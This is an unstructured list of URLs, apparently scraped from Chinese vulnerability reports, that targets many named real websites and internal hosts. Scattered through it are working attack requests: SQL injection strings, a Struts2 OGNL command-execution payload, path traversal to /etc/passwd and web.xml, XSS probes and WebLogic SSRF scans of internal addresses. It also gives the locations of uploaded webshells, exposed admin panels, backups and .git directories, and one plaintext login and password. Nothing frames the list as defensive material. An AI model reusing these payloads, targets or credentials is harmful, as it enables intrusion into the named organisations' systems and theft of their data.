http://**.**.**.**/mylogon/page/searchshow.jsp?query= http://**.**.**.**/mylogon/product.do?method=proinfo&id=S8dskU5C-qfxVXxBb-kcLQg5WI-zQzV9lCY&csid=568&price=18888 http://**.**.**.**/B1plusPortal/admin/upload/ReadAttach?uid=8a8a81a1s27a55973s1236048fa91ss7fee http://**.**.**.**/bugs/wooyun-2015-0133762 http://**.**.**.**/bugs/wooyun-2015-0133762 http://**.**.**.**/OrderRing.aspx?ringNo=810037308337&type=0&ProgCode=null&Seed=64 http://**.**.**.**/OrderRing.aspx?ringNo=9000700020110901021043&type=0&ProgCode=null&Seed=413&returnUrl=http://**.**.**.**/search.aspx?type=0&keyword=waka%2520waka site:oa.sxhtjs.com.cn http://mail.sxhtjs.com/?hl=zh_CN&msg=ERR.LOGIN.PASSERR http://crm.sxhtjs.com/admin/Login.do http://app.hualongxiang.com http://**.**.**.**:7003/console/login/LoginForm.jsp http://**.**.**.**/index_list_bsbz_content.jsp?pkid=321de9d3-389c-4c63-8230-b4b5a0c7a299 http://**.**.**.**/index_list_bsbz_content.jsp?pkid=321de9d3-389c-4c63-8230-b4b5a0c7a299 http://eman.midea.com.cn:8099/ http://event.midea.com/trial/index?f_id_product=7&version_id=7&appview=1&mtag=20025.19.10001#product http://oa.cnbg.com.cn/seeyon/index.jsp http://oa.sinopharmholding.com/seeyon/index.jsp http://**.**.**.**:7001/console/login/LoginForm.jsp cn:7001/icc/template/006/index.jsp http://kc.hljit.edu.cn:7001/console/login/LoginForm.jsp http://42.62.24.19/empty.zip http://**.**.**.**/ http://**.**.**.**/yufangyixue/Ad_Login.asp http://**.**.**.**/tt/contract/contract_auto_salesorder.asp?mainno=1 http://**.**.**.**/tt/contract/contract_auto_salesorder.asp?mainno=1 http://**.**.**.**/tt/contract/contract_auto_salesorder.asp?mainno=1 http://**.**.**.**/tt/multiinput/ExecuteGetDateProc.asp?stanID=1 http://**.**.**.**/tt/multiinput/ExecuteGetDateProc.asp?stanID=1 http://**.**.**.**/tt/multiinput/ExecuteGetDateProc.asp?stanID=1 http://**.**.**.**/tt/multiinput/multigetproc.asp?inputid=1 http://**.**.**.**/tt/multiinput/multigetproc.asp?inputid=1 http://**.**.**.**/tt/multiinput/multigetproc.asp?inputid=1 http://**.**.**.**/tt/page/Page_ExpBuildingInfo.asp?buildid=1 http://**.**.**.**/tt/page/Page_ExpBuildingInfo.asp?buildid=1 http://**.**.**.**/tt/page/Page_ExpBuildingInfo.asp?buildid=1 http://facilitator.org.cn/login.php3 http://116.1.1.249/login.php3 http://114.113.17.230/login.php3 http://121.31.5.183:8000/login.php3 http://oa.andess.com/login.php3 http://www.xiezuozhe.org.cn/login.php3 http://agrionline.net.cn/login.php3 http://oa.gxxd.com.cn/login.php3 http://oa.skyoa.com/login.php3 http://agrionline.net.cn/login.php3 http://nxzxoa.skyoa.com/login.php3 http://test.skyoa.com/login.php3 http://www.skyoa.com/phpcms/index.html http://wooyun.org/bugs/wooyun-2015-0144425/trace/3c295fd2133477eb0787a4f4035ac725 http://u.it168.com/Login?returnUrl=http://www.it168.com/,it168主站登录接口 http://**.**.**.**/bugs/wooyun-2015-0144491/trace/ab6f7fd3b93e59a688e43199c2a57019 http://sj.sxhtjs.com.cn/ http://sj.sxhtjs.com.cn/forgotpass/mmsu http://sj.sxhtjs.com.cn/wsbm http://222.177.208.17:8010/login.aspx http://hr.cootek.cn/hradmin/accountd/login http://hr.cootek.cn:80/hradmin/account/login http://**.**.**.**/infocenter.aspx?typeid=1 http://fotoplace.cc/admin/log.txt http://money.hualongxiang.com/cmslist/?id=29&sn=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%96%B0%E9%97%BB%E5%85%B3%E9%94%AE%E8%AF%8D http://m.zyql.cn/?m=android/scenic.scenicDetail&id=64 http://www.bidainet.com/wapwenda/wendashow/1?no=1&state=0&type=24 http://www.76ju.com/?c=ServiceCenter&action=detail&cid=3&id=25 http://www.bailiandai.com/home/index.action https://www.cardadministration.com/login.jsp?mID=PCC https://www.cardadministration.com/login.jsp?mID=PCC%27%20AND%204950=4950%20AND%20%27EWau%27=%27EWau http://**.**.**.**/Web_Org/Type_List.aspx?typeid=1 http://**.**.**.**/Web_Org/Type_List.aspx?typeid=1 http://**.**.**.**/Web_Org/Type_List.aspx?typeid=1 http://**.**.**.**/Web_Org/Type_List.aspx?typeid=1 http://**.**.**.**/Web_Org/Type_List.aspx?typeid=1 http://**.**.**.**/Web_Org/Type_List.aspx?typeid=1 www.kuwo.cn http://cps.jiapin.com http://shop.huaji.com/shop_search.php?fav=&gcate_id=3212&keyword=&page=1&price=asc&sale=&shop_id=1199546477&time= http://**.**.**.**/reg.aspx?gwid= http://oa.sxhtjs.com.cn/c6/ngstxl/gstxl/acxd.asp http://oa.sxhtjs.com.cn/c6/ngstxl/gstxl/yqhtjs.asp http://oa.sxhtjs.com.cn/c6/ngstxl/gstxl/zcxt.asp http://oa.sxhtjs.com.cn/c6/ngstxl/gstxl/sxzc.asp http://oa.sxhtjs.com.cn/c6/ngstxl/gstxl/ychtjs.asp http://oa.sxhtjs.com.cn/c6/ngstxl/gstxl/czhtjs.asp http://oa.sxhtjs.com.cn/c6/ngstxl/gstxl/llhtjs.asp http://oa.sxhtjs.com.cn/c6/ngstxl/gstxl/zkx.asp http://oa.sxhtjs.com.cn/c6/ngstxl/gstxl/lfhtjs.asp http://oa.sxhtjs.com.cn/c6/ngstxl/gstxl/dthtjs.asp http://oa.sxhtjs.com.cn/c6/ngstxl/gstxl/szhtjs.asp http://oa.sxhtjs.com.cn/c6/ngstxl/gstxl/csxx.asp http://oa.sxhtjs.com.cn/c6/ngstxl/gstxl/jzhtjs.asp http://oa.sxhtjs.com.cn/c6/ngstxl/gstxl/xzhtjs.asp http://oa.sxhtjs.com.cn/c6/ngstxl/gstxl/tyqy.asp http://oa.sxhtjs.com.cn/c6/ngstxl/gstxl/sxhtjs.asp http://euro2012.touzhu.cn/NewsList/1 http://game.kuwo.cn/g/st/CheckEnterGameTime?gid=108&sid=326 http://pan.baidu.com/s/1mg5u0o4 http://**.**.**.**/InfoPage/ShowBidresult.aspx?AnnoID=3065&UrlType=2&SiteItem=127 http://**.**.**.**/InfoPage/ShowBidresult.aspx?AnnoID=3065&UrlType=2&SiteItem=127 http://**.**.**.**/InfoPage/ShowBidresult.aspx?AnnoID=3065&UrlType=2&SiteItem=127 http://tf001.qs.6yoo.com/qs/RemotingServlet port:5800java-jdwp http://gdjh.aipai.com/login.html www.840210808@qq.com www.840210808@qq.com www.diaohui@qq.com www.diaohui@qq.com www.350948926@qq.com www.350948926@qq.com http://game.aipai.com/games.php这里登陆才能上去): http://**.**.**.**/bugs/wooyun-2010-0116346 http://**.**.**.**/bugs/wooyun-2010-086704 http://**.**.**.** http://**.**.**.**/paxy/webLogin/mainPageInit.shtml?uId=2676 http://**.**.**.**/paxy/commonUploadOrDownload/download.shtml?fileId=57 http://**.**.**.**/paxy/webMessage/studentMessageInit.shtml http://**.**.**.**/paxy/mobileAp/viewSpaceLog.shtml?usertype=0&userid=60069&logid=36 http://**.**.**.**/bugs/wooyun-2010-0103484 jdbc:sqlserver**.**.**.**:1433;databaseName=DFZQ_ZYYX jdbc:oracle:thin:@**.**.**.**:1521:tfcrm http://**.**.**.**/bugs/wooyun-2010-0123365 http://**.**.**.**/issue/news_more.jsp?Urltype=12&key=&submit=%B2%E9%D5%D2 http://**.**.**.**/issue/news_more.jsp?Urltype=12&key=&submit=%B2%E9%D5%D2 http://**.**.**.**:81/issue/news_more.jsp?Urltype=12&key=&submit=%B2%E9%D5%D2 http://**.**.**.**/issue/news_more.jsp?Urltype=6&key=&submit=%B2%E9%D5%D2%22%20 http://old.admin.1jiajie.com/server-status www.1jiajie.com www.1jiajie.com http://web.1jiajie.dudujiaoche.com///v2/worker_list.php?worker_id=17888&platform_version=worker http://web.1jiajie.dudujiaoche.com//v2/user_list.php?user_id=54286302,32720539,54182323,541214 http://web.1jiajie.dudujiaoche.com//v2/search_order.php?worker_tel=13716953214&per_page=50&pag http://mail.uqee.com:7777/phpmyadmin/ http://mail.uqee.com:7777/phpinfo.php http://zt.mama.cn/admin/login.php http://**.**.**.**/librarian/book/view-all.asp?ID=25 http://**.**.**.**/librarian/admin/admin_login.asp http://**.**.**.**/Reception/evaluation-1.html http://study.**.**.**.**/ http://study.**.**.**.**/Course/dk_ViewCourse.aspx?c=B692AA9D7FEAD46E&Type=Stu&psIdH=646&cIdH=154 http://study.**.**.**.**/myPaper/ViewExerciseSel.aspx?ModuleID=162&rId=21 javascript://执行js代码"。 about:blank域。对用户是没有危害的,而搜狗浏览器执行的域则为当前域:se://bookmarks/ about:blank) http://mp.midea.com.cn/bsnems/engine_Engine_downEngine.do http://**.**.**.**/ http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd http://pianke.me/api/user/setaddre.php http://pianke.me/api/user/setaddre.php http://**.**.**.**/ http://**.**.**.**/info.do?para=viewmain&showType=08 http://**.**.**.**/public/mobile/ http://crm.haolyy.com http://fang.hualongxiang.com/find/2?phone=555-666-0606 http://**.**.**.**/articlesview.asp?id=1465 http://**.**.**.**/admin_spb/default.asp http://**.**.**.**/wen.asp?c_id=241&n_id=643 http://chinamrgl.com/admin http://www.snda.com http://www.sdo.com https://github.com/liutaihua/scripts/blob/21a118795c64cae8331a77625a493e6049e65fb9/analysis_tsdb.py http://**.**.**.**/,票友ERP管理系统 http://**.**.**.**/PiaoYou_root.aspx http://**.**.**.**/uc_server/ http://webgame.aipai.com/www/login.php www.446364606@qq.com www.137244652@qq.com http://mail.meitunmama.com/ http://**.**.**.**/news.asp?typenumber=0001 http://**.**.**.**/news.asp?typenumber=0001 http://**.**.**.**/news.asp?typenumber=0001 http://**.**.**.**/news.asp?typenumber=0001 http://**.**.**.**/news.asp?typenumber=0001 http://**.**.**.**/news.asp?typenumber=0001 http://**.**.**.**/ http://**.**.**.**/specimen.php?item=A http://**.**.**.**/ann_list.php?class=1 http://**.**.**.**/photos.php?class=3 http://**.**.**.**/actives.php?class=5 http://**.**.**.**/insu.php?class=9 https://user.meitun.com/user/findPassword http://www.crcare.com.hk/trad/service.asp?section=pi&pi_id=21 http://www.crcare.com.hk/admin/ http://qa.touzhu.cn http://**.**.**.**/search/ http://**.**.**.**/submit/logins/ http://**.**.**.**/jiaoguan/message_show.php?message_id=1009 http://www.xunlingol.com/new.php?id=6 http://www.91zjd.com/checkusername.aspx?name= http://**.**.**.** http://**.**.**.**/ReadLog.aspx http://**.**.**.**/UserList.aspx http://baoxian.jbwchina.com:80/ http://**.**.**.**/pic/login.asp username:hxzby password:hxzby+20141203 http://10.10.2.9/ http://**.**.**.**/detail.php?type=men&id=351 http://**.**.**.**/pc_index.do http://rz.cheyipai.com/ http://rz.cheyipai.com http://rms.crclogistics.com/login.aspx http://rms.crclogistics.com http://**.**.**.** http://**.**.**.**/FCKeditor/_samples/asp/sample01.asp x.asp/目录上传解析 http://**.**.**.**/admi/upLoadFile/file/test.asp/xiao.jpg http://mail.ganji.com http://**.**.**.**/publish/list.jsp?lmid=161 http://mail.lotour.com/index.php http://**.**.**.** http://wap.chinaiiss.com/do.php?ac=getnextarticle&do=touch&inajax=1&number=15&topid=4&vtype=touch http://www.ilvxing.com/User/login http://www.oray.com/activity/150903/ http://**.**.**.**/InviteBid/BidBulletin_Public.aspx?p=S20150930006;X201509300004 http://77.hqg.skymoons.com/ http://77.hqg.skymoons.com/HqgActive/detail?id=58294* http://77.hqg.skymoons.com/HqgActive/nlist?type=3* http://77.hqg.skymoons.com/index.php/Admin/loginApi post:un=AAA*&pw=bbb&t=1443934921168 http://77.hqg.skymoons.com/admin http://77.hqg.skymoons.com/Admin?inner=home&word=aa* www.cheyipai.com http://**.**.**.**),存在GET型注入一个。 https://221.228.210.168 http://baoxian.jbwchina.com:80/ http://bbs.yaolan.com/interface/getthread.php?flag=thread&digest=true&fid=24&ret_type=jsonp&callback=func http://www.anxin.com/activity/qixi/2015/?m=0.2637973097153008 http://**.**.**.**/ http://xwxx.sicnu.edu.cn/mail_login.asp http://202.115.194.62:8080/sy/ http://202.115.194.62:8080/sy/upfiles/news/aspx1.aspx http://phy.sicnu.edu.cn:8088 http://epress.sicnu.edu.cn/product_veiw.asp?id=73 http://www.ytkd168.com/root/ http://www.ytkd168.com/Service_search.asp?keyword=88952634&Submit=%26nbsp%3B%26nbsp%3B%26nbsp%3B%26nbsp%3B%EF%BF%BD%EF%BF%BD%D1%AF&select=all http://www.ytkd168.com/Query.asp?ID=%27%0D%0A&button=%26%23160%3B%26%23160%3B%26%23160%3B%26%23160%3B%B2%E9+%D1%AF http://www.ytkd168.com/ShowNews.asp?id=517 http://www.ytkd168.com/ShowNews.asp http://www.ytkd168.com/feedback.asp?type=%D3%A6%C6%B8&zw=%20%27%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E%3C%22 http://www.ytkd168.com/?button=%27%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E%3C%22 http://kia.cheyipai.com http://liantong.cheyipai.com/UserCenter/Login/Index http://hr.supcon.com/ http://hr.supcon.com/Admin/Home/LogOn http://hr.supcon.com http://**.**.**.**/job/Idiaoyan/ http://60.190.252.42:8888/Main.aspx http://60.190.252.42:9999/Main.aspx http://www.u591.com/ http://www.u591.com/sw/news.php?id=1634 http://www.u591.com/lw/news_list.php?TypeID=41 http://www.u591.com/tw/news_list.php?ntype=6 http://www.u591.com/newpay/index.php?game_id=2 http://www.ku25.com/common/check/get_pay_data.php?id=0 http://**.**.**.**/login.jsp url:http://manage.bnu.edu.cn/manager/html/ user:admin http://**.**.**.**/view/8b0f0d718e9951e79b892786.html?from=search。。 http://www.uimi.so/Contact.php?ID=93 http://www.ucsus.com/News.asp?Method=View&NewsID=170 http://hl.pay.joy.cn/search.htm?keyword=-1 http://pay.joy.cn/searchresultnew.aspx?keyword=1 http://**.**.**.**/ http://cms.niu.com/member/index.php?c=api&m=upload&name=shangchuanfujian&code=b11fAyoZfb9DRFMHgdjog+Rbj3lkTaofJ7al8FzXLZObtYBuNv6lpmbhv2wZ/pPh+8aN/wldQZ6jCdHGs7FlTQ http://cms.niu.com/member/uploadfile/201510/2b6290bc0b.php http://gt1406043.**.**.**.**:10000/ http://gs1402096.**.**.**.**:10000/ http://gt1504238.**.**.**.**:10000/ http://gt1504345.**.**.**.**:10000/ http://gt1501031.**.**.**.**:10000/ http://gt1312248.**.**.**.**:10000/ http://gt1401126.**.**.**.**:10000/ http://gt1502179.**.**.**.**:10000/ http://gt1508223.**.**.**.**:10000/ http://bbs.ebogame.com/rss.php?forumid=0&tagname= http://**.**.**.**/ewebeditor/ewebeditor.htm?id=body&style=popup shell:http://**.**.**.**/ewebeditor/uploadfile/20140914151317422.jspx http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://www.**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.**/index.php?m=vote&c=index&a=lists&siteid=1 http://**.**.**.**/index.php?m=vote&c=index&a=lists&siteid=1%27and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20%28select%20concat%280x3a,0x3a,version%28%29%29%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23 http://member.9978.cn/account/passedit https://www.irongbei.com/index/plistcondition=close&cycle=0&income=0&payment=0&status=0&type=0 http://www.u88.com/.git/ http://adm.u88.com/test/admin_user http://lv.funshion.com/lv.funshion.com.tar.gz http://gt1406043.**.**.**.**:10000/ http://gs1402096.**.**.**.**:10000/ http://gt1504238.**.**.**.**:10000/ http://gt1504345.**.**.**.**:10000/ http://gt1501031.**.**.**.**:10000/ http://gt1312248.**.**.**.**:10000/ http://gt1401126.**.**.**.**:10000/ http://gt1502179.**.**.**.**:10000/ http://gt1508223.**.**.**.**:10000/ http://datacargo.ce-air.com/cgreport/ http://b2e.ceair.com/ http://www.dongfeng-nissan.com.cn/region/dongguan/news?newstype=NewsType_002 URL:http://**.**.**.**:81/gjjcx/gjjcx.aspx?grzh=5326210000001 http://wooyun.org/bugs/wooyun-2015-0134466 http://www.51piao.com/Ticket/TicketList.aspx?Name=123&Source=key http://**.**.**.**/newslist.aspx?keyword=12 http://www.yicai.com/news/2014/10/4032648.html http://**.**.**.**/cn/products/fixed-access/colligate-access/ua5000/ http://**.**.**.**/ http://cnc.carjob.com.cn/memRegCheckMessage.do?memEmail=0&flag=3 www.tangguow.cn http://e.lvmama.com/ebooking/login.do http://**.**.**.**/service/fee/zxkf.shtml http://www.uimi.so/News_list.php?BigID=29 http://www.uimi.so/Contact.php?ID=91 http://www.uimi.so/Service.php?ID=92 http://www.uimi.so/Product.php?BigID=2045 http://www.uimi.so/About.php?ID=87 http://arsenal.chinaiiss.com http://**.**.**.**/category.php?cid=4 http://**.**.**.**/index.php?action=show&id=346 http://**.**.**.**/ http://**.**.**.**/zhdj/partymenber/partymenberAction!ajaxView.action?id=25182cd3-a153-4eee-b15a-d8dd81d324cd http://t.jzt.58.com/orderInfo/orderList?orderType=3276&comm_pf=&channel=wx http://114.112.88.210/Login.aspx http://**.**.**.**/news/detail.php?newsID=25 http://**.**.**.**/tv/tv_list.php?cat=2 http://**.**.**.**/news/list.php?cat=1 http://**.**.**.**/magazine/maga_list.php?cat=1 http://**.**.**.**/news/tlist.php?type=2 http://**.**.**.**/photo/?id=340 http://**.**.**.**/tv/tv_detail.php?vid=154 http://**.**.**.**/photo/slider_photo.php?id=340 http://m.mobage.cn/ http://**.**.**.**//platform/app/register.php http://g.kvm.la/#q=%E2%80%9C%E7%89%88%E6%9D%83%E6%89%80%E6%9C%89:K12%E4%B8%AD%E5%9B%BD%E4%B8%AD%E5%B0%8F%E5%AD%A6%E6%95%99%E8%82%B2%E6%95%99%E5%AD%A6%E7%BD%91%22&start=20 http://**.**.**.**/bugs/wooyun-2014-047711 http://**.**.**.**/bugs/wooyun-2014-050127 http://**.**.**.**/bugs/wooyun-2010-060202 http://www.qhdrc.com/ http://www.qhdrc.com/pmodi.php http://**.**.**.**/bugs/wooyun-2015-0116346 http://**.**.**.**/bugs/wooyun-2014-086704 http://ccs.midea.com.cn:8081/uddiexplorer/SearchPublicRegistries.jsp?operator=http://172.16.16.49:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://172.16.16.1/ http://172.16.16.2/ http://172.16.16.3/ http://172.16.16.8/weblogic.uddi.client.structures.exception.XML_SoapException http://172.16.16.8/ http://172.16.16.16/ http://172.16.16.17/ http://172.16.16.18/ http://172.16.16.19/weblogic.uddi.client.structures.exception.XML_SoapException http://172.16.16.19/ http://172.16.16.21/weblogic.uddi.client.structures.exception.XML_SoapException http://172.16.16.22/weblogic.uddi.client.structures.exception.XML_SoapException http://172.16.16.23/weblogic.uddi.client.structures.exception.XML_SoapException http://172.16.16.23/ http://172.16.16.24/ http://172.16.16.25/ http://172.16.16.26/ http://172.16.16.27/ http://172.16.16.29/weblogic.uddi.client.structures.exception.XML_SoapException http://172.16.16.29/ http://172.16.16.38/weblogic.uddi.client.structures.exception.XML_SoapException http://172.16.16.38/ http://**.**.**.**/wap/ http://**.**.**.**/listPage/page1.jsp?id=4bbzlotn-34xa-inss-6dox-5gcccrgvdoke http://112.126.83.148/install/install.php http://oa.hengansl.com/weaver/weaver.email.FileDownloadLocation?download=1&fileid=-2 http://**.**.**.**/info.php?id=6 http://**.**.**.**/showsuit.php?prg_id=1 http://**.**.**.**/news.php?sortid=111 http://**.**.**.**/knowledge.php?kid=686&group=111 http://**.**.**.**/showhos.php?sortid=112&hos_id=1 http://**.**.**.**/showsuit.php?che_id=85 http://**.**.**.**:8980/phpMyAdmin/ http://account.niu.com http://**.**.**.**/gonggao_detail.asp?id=1341 http://**.**.**.**/analyse/baseinfo.asp?FileID=700 http://**.**.**.**/about.asp?id=11 http://www.anxin.com/cal/platforms_cal.aspx?q=* http://www.anxin.com/wiki/wikidetail.aspx?q=* http://www.anxin.com/activity/qixi/2015/?m=0.2637973097153008 http://zsk.chanjet.com/zice/index.php?content-app-category&catid=1 http://treistertest.chanjet.com http://**.**.**.**:8000/ViewBuilding.aspx?ldid=@@version http://**.**.**.**:8000/ViewBuilding.aspx?ldid=@@version http://**.**.**.**/web/guest/home?p_p_id=keyword_search&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&p_p_col_id=column-1&p_p_col_count=1&_keyword_search_struts_action=%2Fkeyword_search%2Fview http://**.**.**.**/bugs/wooyun-2015-0134524 http://www.iwatch365.com/watch/?px=6&desc=desc http://www.iwatch365.com/index.php?m=content&c=index&a=lists&catid=81&ids= http://www.iwatch365.com/forum.php http://mall.ciwong.com/fruit/GetAddress?_=0.9362385582644492&id=xxx http://marry.hualongxiang.com/orders/hotel http://**.**.**/ www.taicang.info2 http://house.taicang.info/list_zx.aspx?xwbt= http://house.taicang.info/lpxq.aspx?id=79 http://zhzw.jnu.edu.cn/ http://zhzw.jnu.edu.cn/zhzw/website/gw/purchaseDetail.php?id=25 http://zhzw.jnu.edu.cn/zhzw/website/hostel/admin/signin.html http://zhzw.jnu.edu.cn/zhzw/website/gw/purchaseDetail.php?id=25 http://htg.yundzh.com/htg.yundzh.com/ttch?version=8.20 unix:/opt/nginx/temp/proxy_temp/nginx.sock http://wap1.huawei.com/uaprof/HW_HUAWEI_Che1-CL10_1_20140801.xml http://www.spider.com.cn/newuserjquery.action?usertype=first010&id=310872&name=123&province=%E4%B8%8A%E6%B5%B7%E5%B8%82&city=%E4%B8%8A%E6%B5%B7%E5%B8%82%E5%8C%BA®ion=%E9%BB%84%E6%B5%A6%E5%8C%BA&address=test&zip=200070&mobile=110&mainflag=checked&tel= http://oa1.yurun.com http://www.pywm.com.cn/success_case---index.html www.pywm.com.cn http://cec.fudan.edu.cn/courseIntroList.jsp?typeId=11 http://api.starapp.ifensi.com/admin.php/Appadmin/index http://appbg.xiaoma.com/mobile_users/84223/edit http://appbg.xiaoma.com/banners http://service.mail.qq.com/cgi-bin/help?subtype=1&&id=28&&no=166 http://service.mail.qq.com/cgi-bin/help?subtype=1&&id=28&&no=166 http://hnzz.vcomlive.com/edms/index.php http://havboss.vcomlive.com/nodeServlet?sysid=1 http://112.124.212.5/index.php/Counselor/index/wt_id/3 http://www.helloan.cn:80/ www.helloan.cn http://tj.medejob.com/jobseeker/stage/FAQ_Question.aspx?id=9 http://**.**.**.**/tips/2065 http://**.**.**.**/shebaokachaxun.asp http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**:8080/help/ch_gb/---此处目录未受权 http://www.zzvcom.com/plant/news.html http://www.zzvcom.com/cms/interface.jsp?time=53&data={readfile:%27/A02/A02016/A02016001/list.json%27}&jsoncallback=jsonp1443599753605 http://www.zzvcom.com/cms/interface.jsp?time=41&data={readfile:%27/WEB-INF/web.xml%27}&jsoncallback=jsonp1442909681355 http://elife.fudan.edu.cn/login.action http://mcrlad.fudan.edu.cn/gb2312/infoview.asp?id=189 http://dev.koyimall.com/mall/list.html?GC=GD00&OC=&ST=SCODE3&inc_mode=a&dep=&oc=good_buy_total&os=desc http://ie.sogou.com/open/doc/?id=2_13&title=sogouExplorer.downloads se-extension://域可以查看搜狗开放的所有api,在对象空间sogouExplorer下面 www.90.niu.com http://**.**.**.**/bugs/wooyun-2010-0123238前人洞而发。 http://**.**.**.**/sysTemplateWeb/AnswerPage.aspx?ArticleID=265 http://**.**.**.**/sysTemplateWeb/AnswerPage.aspx?ArticleID=265 http://**.**.**.**//sysTemplateWeb/AnswerPage.aspx?ArticleID=265 http://**.**.**.**//sysTemplateWeb/AnswerPage.aspx?ArticleID=265 https://**.**.**.**//entry.php?action=getUserinfo2&userId=1%20AND%203*2*1%3d6%20AND%20204%3d204 mongodb://data.midea.com:10010 http://**.**.**.**/opac_two/right.jsp?classmark=A http://**.**.**.**/opac_two/search2/detailSerial.jsp?rec_ctrl_id=11 http://**.**.**.**/downdetailsaction.action http://**.**.**.**/manage/checkloginaction.action http://**.**.**.**/newcontent_fujian_Down.action http://**.**.**.**/manage/checkloginaction.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String%5B%5D{%27ipconfig%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%**.**.**.**.InputStreamReader%28%23b%29,%23d%3dnew%**.**.**.**.BufferedReader%28%23c%29,%23e%3dnew%20char%5B50000%5D,%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://**.**.**.**/newcontent_fujian_Down.action?fi_url=../WEB-INF/web.xml&filename=web.xml http://www.xpchina.com/admin/admin_login.html www.xpchina.com http://www.xpchina.com http://www.dmzj.com/ http://url/hxweb/sub.aspx?type=1&code=0401 http://url/fckeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/aspx/connector.aspx http://url/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F http://**.**.**.**:8003/gspt/login.do?method=logout http://chuangyiren.cn/.git/ mysql:host=localhost;dbname=ccihr http://**.**.**/post/list2.ftltype=0&pageNum=1&pageSize=20&isPost=0&keyword= http://**.**.**/home/index.jsp http://**.**.**/post/list2.ftltype=0&pageNum=1&pageSize=20&isPost=0&keyword= http://123.57.251.8:8081/ http://27.189.197.173:81/user/userlist.jsp http://www.benliwuyou.com/news/newsshow.jsp?id=20%20and%201%3d2 http://**.**.**.**/products/zhgl/23.html URL:http://**.**.**.**/include/vod.php?id=31 http://**.**.**.**/cyportal2.3/DownloadTemplateFile?operate=all http://**.**.**.**/cyportal//DownloadTemplateFile?operate=all ea5f:d1f6:7b69%15]:7001 a65d:cf2a:220d%17]:7001 a65d:cf2a:220d%17]:546 www.metlife.net.cn/admin/login http://www.metlife.net.cn/front/retrieve/retrievePwdPage www.class.cn http://m.in.lizhi.fm/home/index.jsp http://l.youku.com/v/ http://**.**.**.**/ jdbc:oracle:thin:@**.**.**.**:1521:ORCL http://120.hinews.cn http://222.216.227.168:7001/longtu/ http://222.216.227.168:7001/console/login/LoginForm.jsp http://222.216.227.168:7001/ma/ma3.jsp http://**.**.**.**/ http://m.lvmama.com/bullet/index.php?s=/Api/getBootAd&osVersion=4.1.2&lvversion=7.3.0&globalLatitude=22.617606&globalLongitude=114.047714&firstChannel=ANDROID&udid=A0000038518D0C&formate=json&secondChannel=QQ&lvkey=0f78b5b7a528020794c88dd056bdafe2&postkey=E4C7A73A47C046E9A63816DE99D513C4 http://qms.midea.com.cn/ http://qms.midea.com.cn/CE/default.aspx http://qms.midea.com.cn http://**.**.**.**:8080/cstykj/flex/comLogin.html http://112.65.177.6:81/ http://mp.midea.com.cn/bsnems/login_Login_login.do http://mp.midea.com.cn/bsnems/upload/apps/APP2014071445590674/images/70adab23-6d5d-46d2-97d4-3a163e99080e.jsp http://**.**.**.**/database.rar http://**.**.**.**/bugs/wooyun-2010-0122276 http://**.**.**.**/Channel/Company_Show.aspx?ID=9737 http://**.**.**.**/Channel/Company_Show.aspx?ID=9737 http://**.**.**.**/Channel/Company_Show.aspx?ID=9737 http://**.**.**.**/Channel/Company_Show.aspx?ID=9737 http://**.**.**.**/Channel/Company_Show.aspx?ID=9737 box.9ku.com/downloadapp.aspx?t= http://aobo.tcl.com/count/History.asp http://aobo.tcl.com/count/History.asp http://202.108.173.172:7001/console/login/LoginForm.jsp http://202.108.173.172:7001/ma/out.jsp http://**.**.**.**/admin/Include/SelectPic.asp?ChannelID=3&CurrPath=/upfiles http://**.**.**.**/admin/ad_login.asp http://t.suyun.58.com http://180.169.55.148/defaultroot/Logon!logon.action http://**.**.**.**/admin/ftb.imagegallery.aspx?rif=~/admin/upimage&cif=~/admin/upimage&ftb=free1 http://**.**.**.**/boss/Login.asp http://**.**.**.**/NewsInfo.asp?Action=Co&id=658 http://**.**.**.**/ http://**.**.**.**/test.php http://**.**.**.**/check.php http://mes.juneyaoair.com/mes/ http://mes.juneyaoair.com/mes/wkrequirement/preUpload.do?pkid=13541&billNo=ZL0092 http://mes.juneyaoair.com/mes/wkrequirement/fileList.do?id=13541 http://gugong.228.com.cn/annual/sureOrder http://**.**.**.**/ http://**.**.**.**:8088 http://vip1.gaotime.com/info-weixinAdmin/accountQueryInfo.do jdbc:oracle:thin:@**.**.**.**:1521/jlgswt http://**.**.**.**/upload.php http://**.**.**.**/index.jsp http://ekp.joyu.com/login.jsp http://m.campsort.com/ http://fenxiao.lvmama.com/ http://m.lvmama.com/clutter/login.htm# http://flight.lvmama.com/findorder.php www.lvmama.com http://www.lvmama.com http://www.aiba.com:9200/_plugin/bigdesk/../../../../../../etc/passwd http://api.jpush.cn:8800/sendmsg/v2/sendmsg http://sdk2.zucp.net:8060/webservice.asmx/mt http://**.**.**.**/news/news_khsh.asp 